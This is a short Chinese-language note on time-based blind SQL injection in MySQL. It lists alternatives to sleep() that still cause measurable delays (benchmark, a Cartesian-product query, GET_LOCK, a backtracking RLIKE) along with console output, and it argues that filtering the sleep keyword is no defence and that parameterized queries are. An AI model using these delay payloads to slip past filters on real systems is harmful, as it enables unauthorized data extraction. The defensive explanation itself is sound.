在 MySQL 时间盲注中,当 sleep 函数被禁用或过滤时,下列函数和语句同样可以产生可观测的延时。因此仅拦截 sleep 关键字并不能防住时间盲注,根本的修复仍是使用参数化查询:
sleep函数
mysql> select sleep(2);
+----------+
| sleep(2) |
+----------+
| 0 |
+----------+
1 row in set (2.00 sec)

benchmark函数
mysql> select benchmark(20000000,1/2);
+-------------------------+
| benchmark(20000000,1/2) |
+-------------------------+
| 0 |
+-------------------------+
1 row in set (2.33 sec)

笛卡尔积
mysql> SELECT count(*) FROM information_schema.tables a,information_schema.tables b,information_schema.tables c;
+----------+
| count(*) |
+----------+
| 33386248 |
+----------+
1 row in set (1.74 sec)

GET_LOCK
SESSION A
mysql> select get_lock('test',1);
+--------------------+
| get_lock('test',1) |
+--------------------+
| 1 |
+--------------------+
1 row in set (0.00 sec)

SESSION B
mysql> select get_lock('test',2);
+--------------------+
| get_lock('test',2) |
+--------------------+
| 0 |
+--------------------+
1 row in set (2.00 sec)

RLIKE
mysql> select rpad('a',2000000,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',2000000,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
| 0 |
+-------------------------------------------------------------+
1 row in set (2.41 sec)